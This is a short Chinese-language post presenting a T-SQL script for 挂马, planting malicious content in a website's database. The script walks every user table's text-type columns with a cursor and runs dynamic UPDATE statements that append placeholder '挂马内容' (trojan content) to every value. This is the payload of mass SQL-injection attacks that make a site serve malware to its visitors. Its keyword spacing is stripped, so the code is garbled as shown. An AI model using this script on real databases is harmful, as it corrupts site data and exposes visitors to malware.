SQL语句如下：

用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）

xtype=99ntext

xtype=35text

xtype=231nvarchar

xtype=167varchar

———————YD的分割——————————–

DECLARE@Tvarchar(255),

@Cvarchar(255)

DECLARETable_CursorCURSORFOR

Select

a.name,b.name

fromsysobjectsa,

syscolumnsb

wherea.id=b.idand

a.xtype='u'and

(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)

OPENTable_Cursor

FETCHNEXTFROMTable_CursorINTO@T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

exec('update['+@T+']set['+@C+']=

rtrim(convert(varchar,['+@C+']))+

”挂马内容”')

FETCHNEXTFROMTable_CursorINTO@T,@C

END

CLOSETable_Cursor

DEALLOCATETable_Cursor

———————YD的分割——————————–